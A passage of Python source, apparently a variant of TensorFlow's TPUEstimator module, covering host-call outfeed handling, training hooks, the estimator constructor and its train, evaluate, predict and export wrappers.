self._tensor_dtypes[name].append(tensor.dtype)
self._tensor_shapes[name].append(tensor.shape)
def create_enqueue_op(self):
"""Create the op to enqueue the recorded host_calls.
Returns:
A list of enqueue ops, which is empty if there are no host calls.
"""
if not self._names:
return []
tensors = []
# TODO(jhseu): Consider deduping tensors.
for name in self._names:
tensors.extend(self._tensors[name])
with ops.device(tpu.core(0)):
return [tpu_ops.outfeed_enqueue_tuple(tensors)]
def create_tpu_hostcall(self):
"""Sends the tensors through outfeed and runs the host_fn on CPU.
The tensors are concatenated along dimension 0 to form a global tensor
across all shards. The concatenated function is passed to the host_fn and
executed on the first host.
Returns:
A dictionary mapping name to the return type of the host_call by that
name.
Raises:
RuntimeError: If outfeed tensor is scalar.
"""
if not self._names:
return {}
ret = {}
# For each i, dequeue_ops[i] is a list containing the tensors from all
# shards. This list is concatenated later.
dequeue_ops = []
tensor_dtypes = []
tensor_shapes = []
for name in self._names:
for _ in self._tensors[name]:
dequeue_ops.append([])
for dtype in self._tensor_dtypes[name]:
tensor_dtypes.append(dtype)
for shape in self._tensor_shapes[name]:
tensor_shapes.append(shape)
# Outfeed ops execute on each replica's first logical core. Note: we must
# constraint it such that we have at most one outfeed dequeue and enqueue
# per replica.
for i in xrange(self._ctx.num_replicas):
host_device, ordinal_id = self._ctx.device_for_replica(i)
with ops.device(host_device):
outfeed_tensors = tpu_ops.outfeed_dequeue_tuple(
dtypes=tensor_dtypes,
shapes=tensor_shapes,
device_ordinal=ordinal_id,
)
for j, item in enumerate(outfeed_tensors):
dequeue_ops[j].append(item)
# Deconstruct dequeue ops.
dequeue_ops_by_name = {}
pos = 0
for name in self._names:
dequeue_ops_by_name[name] = dequeue_ops[
pos : pos + len(self._tensors[name])
]
pos += len(self._tensors[name])
# It is assumed evaluation always happens on single host TPU system. So,
# place all ops on tpu host if possible.
#
# TODO(jhseu): Evaluate whether this is right for summaries.
with ops.device(self._ctx.tpu_host_placement_function(replica_id=0)):
for name in self._names:
dequeue_ops = dequeue_ops_by_name[name]
for i, item in enumerate(dequeue_ops):
if dequeue_ops[i][0].shape.ndims == 0:
raise RuntimeError(
"All tensors outfed from TPU should preserve batch size "
"dimension, but got scalar {}".format(dequeue_ops[i][0])
)
# TODO(xiejw): Allow users to specify the axis for batch size
# dimension.
dequeue_ops[i] = array_ops.concat(dequeue_ops[i], axis=0)
if self._tensor_keys[name] is not None:
# The user-provided eval_metrics[1] is a dict.
dequeue_ops = dict(zip(self._tensor_keys[name], dequeue_ops))
try:
ret[name] = self._host_fns[name](**dequeue_ops)
except TypeError as e:
logging.warning(
"Exception while calling %s: %s. It is likely the tensors "
"(%s[1]) do not match the "
"function's arguments",
name,
e,
name,
)
raise e
else:
ret[name] = self._host_fns[name](*dequeue_ops)
return ret
class _OutfeedHostCallHook(session_run_hook.SessionRunHook):
"""Hook to run host calls when use_tpu=False."""
def __init__(self, tensors):
self._tensors = tensors
def begin(self):
# We duplicate this code from the TPUInfeedOutfeedSessionHook rather than
# create a separate hook to guarantee execution order, because summaries
# need to be initialized before the outfeed thread starts.
# TODO(jhseu): Make a wrapper hook instead?
self._init_ops = contrib_summary.summary_writer_initializer_op()
# Get all the writer resources from the initializer, so we know what to
# flush.
self._finalize_ops = []
for op in self._init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def after_create_session(self, session, coord):
session.run(self._init_ops)
def before_run(self, run_context):
return basic_session_run_hooks.SessionRunArgs(self._tensors)
def end(self, session):
session.run(self._finalize_ops)
class ExamplesPerSecondHook(basic_session_run_hooks.StepCounterHook):
"""Calculate and report global_step/sec and examples/sec during runtime."""
def __init__(
self,
batch_size,
every_n_steps=100,
every_n_secs=None,
output_dir=None,
summary_writer=None,
):
self._batch_size = batch_size
super(ExamplesPerSecondHook, self).__init__(
every_n_steps=every_n_steps,
every_n_secs=every_n_secs,
output_dir=output_dir,
summary_writer=summary_writer,
)
def _log_and_record(self, elapsed_steps, elapsed_time, global_step):
global_step_per_sec = elapsed_steps / elapsed_time
examples_per_sec = self._batch_size * global_step_per_sec
if self._summary_writer is not None:
global_step_summary = Summary(
value=[
Summary.Value(
tag="global_step/sec", simple_value=global_step_per_sec
)
]
)
example_summary = Summary(
value=[Summary.Value(tag="examples/sec", simple_value=examples_per_sec)]
)
self._summary_writer.add_summary(global_step_summary, global_step)
self._summary_writer.add_summary(example_summary, global_step)
logging.info("global_step/sec: %g", global_step_per_sec)
logging.info("examples/sec: %g", examples_per_sec)
class InstallSignalHandlerHook(session_run_hook.SessionRunHook):
"""Change SIGINT (CTRL^C) handler to force quit the process.
The default behavior often results in hanging processes.
The original handler is restored after training/evaluation.
"""
def __init__(self):
self._signal_fn = signal.getsignal(signal.SIGINT)
def before_run(self, run_context):
signal.signal(signal.SIGINT, signal.SIG_DFL)
def end(self, session):
signal.signal(signal.SIGINT, self._signal_fn)
class TPUEstimator(estimator_lib.Estimator):
"""Estimator with TPU support.
TPUEstimator also supports training on CPU and GPU. You don't need to define
a separate `tf.estimator.Estimator`.
TPUEstimator handles many of the details of running on TPU devices, such as
replicating inputs and models for each core, and returning to host
periodically to run hooks.
TPUEstimator transforms a global batch size in params to a per-shard batch
size when calling the `input_fn` and `model_fn`. Users should specify
global batch size in constructor, and then get the batch size for each shard
in `input_fn` and `model_fn` by `params['batch_size']`.
- For training, `model_fn` gets per-core batch size; `input_fn` may get
per-core or per-host batch size depending on `per_host_input_for_training`
in `TPUConfig` (See docstring for TPUConfig for details).
- For evaluation and prediction, `model_fn` gets per-core batch size and
`input_fn` get per-host batch size.
Evaluation
==========
`model_fn` should return `TPUEstimatorSpec`, which expects the `eval_metrics`
for TPU evaluation. However, if eval_on_tpu is False, `model_fn` must return
`EstimatorSpec` and the evaluation will execute on CPU or GPU; in this case
the following discussion on TPU evaluation does not apply.
`TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. (See
`TPUEstimatorSpec` for details). `metric_fn` takes the `tensors` and returns
a dict from metric string name to the result of calling a metric function,
namely a `(metric_tensor, update_op)` tuple.
One can set `use_tpu` to `False` for testing. All training, evaluation, and
predict will be executed on CPU. `input_fn` and `model_fn` will receive
`train_batch_size` or `eval_batch_size` unmodified as `params['batch_size']`.
Current limitations:
--------------------
1. TPU evaluation only works on a single host (one TPU worker) except
BROADCAST mode.
2. `input_fn` for evaluation should **NOT** raise an end-of-input exception
(`OutOfRangeError` or `StopIteration`). And all evaluation steps and all
batches should have the same size.
Example (MNIST):
----------------
```
# The metric Fn which runs on CPU.
def metric_fn(labels, logits):
predictions = tf.argmax(logits, 1)
return {
'accuracy': tf.metrics.precision(
labels=labels, predictions=predictions),
}
# Your model Fn which runs on TPU (eval_metrics is list in this example)
def model_fn(features, labels, mode, config, params):
...
logits = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, [labels, logits]))
# or specify the eval_metrics tensors as dict.
def model_fn(features, labels, mode, config, params):
...
final_layer_output = ...
if mode = tf.estimator.ModeKeys.EVAL:
return tpu_estimator.TPUEstimatorSpec(
mode=mode,
loss=loss,
eval_metrics=(metric_fn, {
'labels': labels,
'logits': final_layer_output,
}))
```
Prediction
==========
Prediction on TPU is an experimental feature to support large batch inference.
It is not designed for latency-critical system. In addition, due to some
usability issues, for prediction with small dataset, CPU `.predict`, i.e.,
creating a new `TPUEstimator` instance with `use_tpu=False`, might be more
convenient.
Note: In contrast to TPU training/evaluation, the `input_fn` for prediction
*should* raise an end-of-input exception (`OutOfRangeError` or
`StopIteration`), which serves as the stopping signal to `TPUEstimator`. To be
precise, the ops created by `input_fn` produce one batch of the data.
The `predict()` API processes one batch at a time. When reaching the end of
the data source, an end-of-input exception should be raised by one of these
operations. The user usually does not need to do this manually. As long as the
dataset is not repeated forever, the `tf.data` API will raise an end-of-input
exception automatically after the last batch has been produced.
Note: Estimator.predict returns a Python generator. Please consume all the
data from the generator so that TPUEstimator can shutdown the TPU system
properly for user.
Current limitations:
--------------------
1. TPU prediction only works on a single host (one TPU worker).
2. `input_fn` must return a `Dataset` instance rather than `features`. In
fact, .train() and .evaluate() also support Dataset as return value.
Example (MNIST):
----------------
```
height = 32
width = 32
total_examples = 100
def predict_input_fn(params):
batch_size = params['batch_size']
images = tf.random_uniform(
[total_examples, height, width, 3], minval=-1, maxval=1)
dataset = tf.data.Dataset.from_tensor_slices(images)
dataset = dataset.map(lambda images: {'image': images})
dataset = dataset.batch(batch_size)
return dataset
def model_fn(features, labels, params, mode):
# Generate predictions, called 'output', from features['image']
if mode == tf.estimator.ModeKeys.PREDICT:
return tf.contrib.tpu.TPUEstimatorSpec(
mode=mode,
predictions={
'predictions': output,
'is_padding': features['is_padding']
})
tpu_est = TPUEstimator(
model_fn=model_fn,
...,
predict_batch_size=16)
# Fully consume the generator so that TPUEstimator can shutdown the TPU
# system.
for item in tpu_est.predict(input_fn=input_fn):
# Filter out item if the `is_padding` is 1.
# Process the 'predictions'
```
Exporting
=========
`export_savedmodel` exports 2 metagraphs, one with `tag_constants.SERVING`,
and another with `tag_constants.SERVING` and `tag_constants.TPU`.
At serving time, these tags are used to select metagraph to load.
Before running the graph on TPU, TPU system needs to be initialized. If
TensorFlow Serving model-server is used, this is done automatically. If
not, please call `session.run(tpu.initialize_system())`.
`tpu.outside_compilation` can be used to wrap TPU incompatible ops in
`model_fn`.
Example:
----------------
```
def model_fn(features, labels, mode, config, params):
...
logits = ...
export_outputs = {
'logits': export_output_lib.PredictOutput(
{'logits': logits})
}
def host_call(logits):
class_ids = math_ops.argmax(logits)
classes = string_ops.as_string(class_ids)
export_outputs['classes'] =
export_output_lib.ClassificationOutput(classes=classes)
tpu.outside_compilation(host_call, logits)
...
```
"""
def __init__(
self,
model_fn=None,
train_cache_fn=None,
eval_cache_fn=None,
model_dir=None,
config=None,
params=None,
use_tpu=True,
train_batch_size=None,
eval_batch_size=None,
predict_batch_size=None,
batch_axis=None,
eval_on_tpu=True,
export_to_tpu=True,
warm_start_from=None,
):
"""Constructs an `TPUEstimator` instance.
Args:
model_fn: Model function as required by `Estimator` which returns
EstimatorSpec or TPUEstimatorSpec. `training_hooks`, 'evaluation_hooks',
and `prediction_hooks` must not capure any TPU Tensor inside the model_fn.
model_dir: Directory to save model parameters, graph and etc. This can
also be used to load checkpoints from the directory into a estimator to
continue training a previously saved model. If `None`, the model_dir in
`config` will be used if set. If both are set, they must be same. If
both are `None`, a temporary directory will be used.
config: An `tpu_config.RunConfig` configuration object. Cannot be `None`.
params: An optional `dict` of hyper parameters that will be passed into
`input_fn` and `model_fn`. Keys are names of parameters, values are
basic python types. There are reserved keys for `TPUEstimator`,
including 'batch_size'.
use_tpu: A bool indicating whether TPU support is enabled. Currently,
- TPU training and evaluation respect this bit, but eval_on_tpu can
override execution of eval. See below.
- Predict still happens on CPU.
train_batch_size: An int representing the global training batch size.
TPUEstimator transforms this global batch size to a per-shard batch
size, as params['batch_size'], when calling `input_fn` and `model_fn`.
Cannot be `None` if `use_tpu` is `True`.
Must be divisible by total number of replicas.
eval_batch_size: An int representing evaluation batch size.
Must be divisible by total number of replicas.
predict_batch_size: An int representing the prediction batch size.
Must be divisible by total number of replicas.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards. For example, if your input_fn produced (images, labels)
where the images tensor is in `HWCN` format, your shard dimensions would
be [3, 0], where 3 corresponds to the `N` dimension of your images
Tensor, and 0 corresponds to the dimension along which to split the
labels to match up with the corresponding images. If None is supplied,
and per_host_input_for_training is True, batches will be sharded based
on the major dimension. If tpu_config.per_host_input_for_training is
False or `PER_HOST_V2`, batch_axis is ignored.
eval_on_tpu: If False, evaluation runs on CPU or GPU. In this case, the
model_fn must return `EstimatorSpec` when called with `mode` as `EVAL`.
export_to_tpu: If True, `export_savedmodel()` exports a metagraph for
serving on TPU besides the one on CPU.
warm_start_from: Optional string filepath to a checkpoint or SavedModel to
warm-start from, or a `tf.estimator.WarmStartSettings`
object to fully configure warm-starting. If the string
filepath is provided instead of a `WarmStartSettings`,
then all variables are warm-started, and it is assumed
that vocabularies and Tensor names are unchanged.
Raises:
ValueError: `params` has reserved keys already.
"""
if config is None or not isinstance(config, tpu_config.RunConfig):
raise ValueError(
"`config` must be provided with type `tpu_config.RunConfig`"
)
if params is not None and any(k in params for k in _RESERVED_PARAMS_KEYS):
raise ValueError(
"{} are reserved keys but existed in params {}.".format(
_RESERVED_PARAMS_KEYS, params
)
)
if use_tpu:
# Perform some very basic validations. More validations will be found in
# _InternalTPUContext.
if train_batch_size is None:
raise ValueError("`train_batch_size` cannot be `None`")
util_lib.check_positive_integer(train_batch_size, "train_batch_size")
if (
config.tpu_config.per_host_input_for_training
is tpu_config.InputPipelineConfig.PER_SHARD_V1
and config.tpu_config.num_cores_per_replica
):
raise ValueError(
"Model parallelism only supports per host input for training. "
"Please adjust TPURunconfig.per_host_input_for_training."
)
if eval_batch_size is not None:
util_lib.check_positive_integer(eval_batch_size, "eval_batch_size")
if predict_batch_size is not None:
util_lib.check_positive_integer(
predict_batch_size, "predict_batch_size"
)
# Verifies the model_fn signature according to Estimator framework.
estimator_lib._verify_model_fn_args(
model_fn, params
) # pylint: disable=protected-access
# We cannot store config and params in this constructor as parent
# constructor might change them, such as assigning a temp dir for
# config.model_dir.
model_function = self._augment_model_fn(
model_fn, train_cache_fn, eval_cache_fn, batch_axis
)
# Overwrite log_step_count_steps to disable TensorLoggingHook and
# StepCounterHook from being created in Estimator. TPUEstimator already
# added equivalent hooks in _augment_model_fn above.
self._log_every_n_steps = config.log_step_count_steps
config = config.replace(log_step_count_steps=None)
# Passing non-None params as wrapped model_fn has it.
params = params or {}
super(TPUEstimator, self).__init__(
model_fn=model_function,
model_dir=model_dir,
config=config,
params=params,
warm_start_from=warm_start_from,
)
self._iterations_per_training_loop = self._config.tpu_config.iterations_per_loop
# All properties passed to _InternalTPUContext are immutable.
# pylint: disable=protected-access
self._ctx = tpu_context._get_tpu_context(
self._config,
train_batch_size,
eval_batch_size,
predict_batch_size,
use_tpu,
eval_on_tpu,
)
self._export_to_tpu = export_to_tpu
self._is_input_fn_invoked = None
self._rendezvous = {}
def _add_meta_graph_for_mode(
self,
builder,
input_receiver_fn_map,
checkpoint_path,
strip_default_attrs,
save_variables=True,
mode=model_fn_lib.ModeKeys.PREDICT,
export_tags=None,
check_variables=True,
):
if self._export_to_tpu and mode != model_fn_lib.ModeKeys.PREDICT:
raise NotImplementedError(
"TPUEstimator only handles mode PREDICT for exporting "
"when `export_to_tpu` is `True`; "
"got {}.".format(mode)
)
(
super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
strip_default_attrs,
save_variables,
mode=mode,
export_tags=export_tags,
check_variables=check_variables,
)
)
if self._export_to_tpu:
input_receiver_fn_map = {
_REWRITE_FOR_INFERENCE_MODE: input_receiver_fn_map[mode]
}
export_tags = [tag_constants.SERVING, tag_constants.TPU]
mode = _REWRITE_FOR_INFERENCE_MODE
# See b/110052256 for why `check_variables` is `False`.
(
super(TPUEstimator, self)._add_meta_graph_for_mode(
builder,
input_receiver_fn_map,
checkpoint_path,
strip_default_attrs,
save_variables=False,
mode=mode,
export_tags=export_tags,
check_variables=False,
)
)
def _call_model_fn(self, features, labels, mode, config):
if mode == _REWRITE_FOR_INFERENCE_MODE:
return self._call_model_fn_for_inference(features, labels, mode, config)
else:
return super(TPUEstimator, self)._call_model_fn(
features, labels, mode, config
)
def _call_model_fn_for_inference(self, features, labels, mode, config):
"""Wraps `_call_model_fn` for `export_savedmodel`."""
if mode != _REWRITE_FOR_INFERENCE_MODE:
raise ValueError(
"mode must be {}; " "got {}.".format(_REWRITE_FOR_INFERENCE_MODE, mode)
)
capture = _CapturedObject()
def computation():
"""Compute tpu tensors used in export_outputs.
Passed to rewrite_for_inference so that model_fn will be called under
the rewriting contexts. Only tpu tensors are returned, but export_outputs
and scaffold are captured.
Returns:
A list of Tensors used in export_outputs and not marked for
outside_compilation.
"""
# We should only call model fn once and it should be inside `computation`
# so that building the graph will happen under `rewrite_for_inference`.
mode = model_fn_lib.ModeKeys.PREDICT
estimator_spec = self._call_model_fn(features, labels, mode, config)
# We pick the TPU tensors out from `export_output` and later return them
# from `computation` for rewriting.
tensors_dict = collections.OrderedDict(
(k, _export_output_to_tensors(v))
for k, v in six.iteritems(estimator_spec.export_outputs)
)
tensors = nest.flatten(tensors_dict)
tpu_tensors = [t for t in tensors if _is_tpu_tensor(t)]
# We cannot return anything other than `tpu_tensors` here so we capture
# the rest for later use.
capture.capture((estimator_spec, tensors_dict, tensors))
return tpu_tensors
tpu_tensors_on_cpu = tpu.rewrite_for_inference(computation)
estimator_spec, tensors_dict, tensors = capture.get()
# Reconstruct `tensors`, but with `tpu_tensors` replaced with
# `tpu_tensors_on_cpu`.
new_tensors = []
for t in tensors:
if _is_tpu_tensor(t):
new_tensors.append(tpu_tensors_on_cpu.pop(0))
elif t is None:
new_tensors.append(None)
else:
# Only fetching `tpu_tensors_on_cpu` does not trigger
# TPU computation and blocks, so we add the control dependency here.
control_inputs = (
tpu_tensors_on_cpu
if isinstance(tpu_tensors_on_cpu, (list, tuple))
else (tpu_tensors_on_cpu,)
)
with ops.control_dependencies(control_inputs):
new_tensors.append(array_ops.identity(t))
# Reconstruct `tensors_dict`.
new_tensors_dict = nest.pack_sequence_as(tensors_dict, new_tensors)
# Reconstruct `export_outputs`.
export_outputs = estimator_spec.export_outputs
new_export_outputs = collections.OrderedDict(
(k, _clone_export_output_with_tensors(export_outputs[k], v))
for k, v in six.iteritems(new_tensors_dict)
)
return estimator_spec._replace(export_outputs=new_export_outputs)
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps
)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
"For TPU training, one of `steps` or `max_steps` must be set. "
"Cannot be both `None`."
)
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, "Train steps")
if max_steps is not None:
util_lib.check_positive_integer(max_steps, "Train max_steps")
return [
_TPUStopAtStepHook(self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError("Evaluate `steps` must be set on TPU. Cannot be `None`.")
util_lib.check_positive_integer(steps, "Eval steps")
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps
),
_SetEvalIterationsHook(steps),
]
def _call_input_fn(self, input_fn, mode):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
Returns:
Either features or (features, labels) where features and labels are:
features - `Tensor` or dictionary of string feature name to `Tensor`.
labels - `Tensor` or dictionary of `Tensor` with labels.
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = function_utils.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if "params" in input_fn_args:
kwargs["params"] = self.params # a deep copy.
else:
raise ValueError(
"input_fn ({}) does not include params argument, "
"required by TPUEstimator to pass batch size as "
'params["batch_size"]'.format(input_fn)
)
if "config" in input_fn_args:
kwargs["config"] = config
if "mode" in input_fn_args:
kwargs["mode"] = mode
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
# Setting the batch size in params first. This helps user to have same
# input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
_add_item_to_params(
kwargs["params"], _BATCH_SIZE_KEY, batch_size_for_input_fn
)
# For export_savedmodel, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with ops.device("/device:CPU:0"):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn(ctx):
_add_item_to_params(kwargs["params"], _CTX_KEY, ctx)
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has stronger check. Parent class's check generates confusing warning msg.
Args:
result: `features` returned by input_fn.
"""
pass
def train(
self, input_fn, hooks=None, steps=None, max_steps=None, saving_listeners=None
):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.TRAIN] = rendezvous
try:
return super(TPUEstimator, self).train(
input_fn=input_fn,
hooks=hooks,
steps=steps,
max_steps=max_steps,
saving_listeners=saving_listeners,
)
except Exception: # pylint: disable=broad-except
rendezvous.record_error("training_loop", sys.exc_info())
finally:
rendezvous.record_done("training_loop")
rendezvous.raise_errors()
def evaluate(
self, input_fn, steps=None, hooks=None, checkpoint_path=None, name=None
):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.EVAL] = rendezvous
try:
return super(TPUEstimator, self).evaluate(
input_fn,
steps=steps,
hooks=hooks,
checkpoint_path=checkpoint_path,
name=name,
)
except Exception: # pylint: disable=broad-except
rendezvous.record_error("evaluation_loop", sys.exc_info())
finally:
rendezvous.record_done("evaluation_loop")
rendezvous.raise_errors()
def predict(
self,
input_fn,
predict_keys=None,
hooks=None,
checkpoint_path=None,
yield_single_examples=True,
):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.PREDICT] = rendezvous
try:
for result in super(TPUEstimator, self).predict(
input_fn=input_fn,
predict_keys=predict_keys,
hooks=hooks,
checkpoint_path=checkpoint_path,
yield_single_examples=yield_single_examples,
):
yield result
except Exception: # pylint: disable=broad-except
rendezvous.record_error("prediction_loop", sys.exc_info())
finally:
rendezvous.record_done("prediction_loop")
rendezvous.raise_errors()
rendezvous.record_done("prediction_loop")
rendezvous.raise_errors()
def _augment_model_fn(self, model_fn, train_cache_fn, eval_cache_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(
model_fn, train_cache_fn, eval_cache_fn, config, params, ctx
)
# `input_fn` is called in `train()`, `evaluate()`, and `predict()`,
# but not in `export_savedmodel()`.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
# examples_hook is added to training_hooks for both CPU and TPU
# execution.
examples_hook = ExamplesPerSecondHook(
ctx.global_batch_size,
output_dir=self.model_dir,
every_n_steps=self._log_every_n_steps,
)
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
logging.info("Running %s on CPU", mode)
estimator_spec = model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode
)
estimator_spec = estimator_spec._replace(
training_hooks=estimator_spec.training_hooks + (examples_hook,)
)
return estimator_spec
assert labels is None, "`labels` passed to `model_fn` must be `None`."
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), "`input_fn` is not callable."
input_fn = features
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn()
)
graph = ops.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
loss, host_call, scaffold, training_hooks = _train_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn
)
if model_fn_wrapper._params.get("track_mean", False):
iterations_per_loop_var = _create_or_get_iterations_per_loop()
loss = math_ops.div(
loss,
math_ops.cast(iterations_per_loop_var, dtype=loss.dtype),
)
host_ops = host_call.create_tpu_hostcall()
if host_ops is None:
host_ops = []
shutdown_hooks = []
shutdown_mode = os.environ.get(
"TF_TPU_GRACEFUL_SHUTDOWN_MODE", "shutdown_worker"
)
if shutdown_mode:
if shutdown_mode == "shutdown_worker":
finalizer_hooks = [
session_support.ShutdownLameWorkers(
timeout_ms=60 * 1000
)
]
elif shutdown_mode == "shutdown_computation":
finalizer_hooks = [
session_support.RestartComputation(timeout_ms=60 * 1000)
]
else:
raise ValueError(
'Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"'
% shutdown_mode
)
shutdown_hooks.append(
session_support.GracefulShutdownHook(
checkpoint_prefix=self.model_dir + "/model.ckpt",
on_shutdown_hooks=finalizer_hooks,
)
)
with ops.control_dependencies([loss]):
global_step = array_ops.identity(training.get_global_step())
hooks = input_hooks + shutdown_hooks
logging_hook_frequency = ( # Divide and round up
self._log_every_n_steps
+ self._config.tpu_config.iterations_per_loop
- 1
) // self._config.tpu_config.iterations_per_loop
iterations_per_loop = array_ops.identity(
_create_or_get_iterations_per_loop()
)
hooks.extend(
[
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator
),
rendezvous=self._rendezvous[mode],
),
InstallSignalHandlerHook(),
training.LoggingTensorHook(
{
"loss": array_ops.identity(loss),
"ppl": tensorflow.exp(loss),
"bpc": loss / tensorflow.constant(math.log(2)),
"#iter/loop": iterations_per_loop,
"global step": global_step,
},
every_n_iter=logging_hook_frequency,
),
]
)
examples_hook._set_steps_per_run( # pylint: disable=protected-access
self._config.tpu_config.iterations_per_loop
)
hooks.append(examples_hook)
if training_hooks:
hooks.extend(training_hooks)
chief_hooks = []
if (
self._config.save_checkpoints_secs
or self._config.save_checkpoints_steps
):
checkpoint_hook = training.CheckpointSaverHook(
self.model_dir,
save_secs=self._config.save_checkpoints_secs,
save_steps=self._config.save_checkpoints_steps,
scaffold=scaffold,
)
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
self._config.tpu_config.iterations_per_loop
)
chief_hooks.append(checkpoint_hook)
summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with ops.control_dependencies([loss]):
update_ops = _sync_variables_ops()
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph()
train_op = control_flow_ops.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_chief_hooks=chief_hooks,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold,
)
if mode == model_fn_lib.ModeKeys.EVAL:
total_loss, host_calls, scaffold, eval_hooks = _eval_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn
)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = math_ops.div(
total_loss,
math_ops.cast(iterations_per_loop_var, dtype=total_loss.dtype),
)
# Creates a dummy metric update_op for all metrics. Estimator expects
# all metrics in eval_metric_ops have update_op and calls them one by
# one. The real metric update_ops are invoked in a separated thread.
# So, here give Estimator the dummy op for all metrics.
with ops.control_dependencies([mean_loss]):
# After TPU evaluation computation is done (the mean_loss tensor),
# reads all variables back from TPU and updates the eval step
# counter properly
internal_ops_to_run = _sync_variables_ops()
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var)
)
with ops.control_dependencies(internal_ops_to_run):
dummy_update_op = control_flow_ops.no_op()
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
for k, v in host_call_ret.get("eval_metrics", {}).items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
if "host_call" not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret["host_call"]
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator
),
rendezvous=self._rendezvous[mode],
)
] + input_hooks
if eval_hooks:
hooks.extend(eval_hooks)
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold,
)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
(
dummy_predict_op,
host_calls,
scaffold,
prediction_hooks,
) = _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn)
with ops.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops()
with ops.control_dependencies(internal_ops_to_run):
dummy_predict_op = control_flow_ops.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
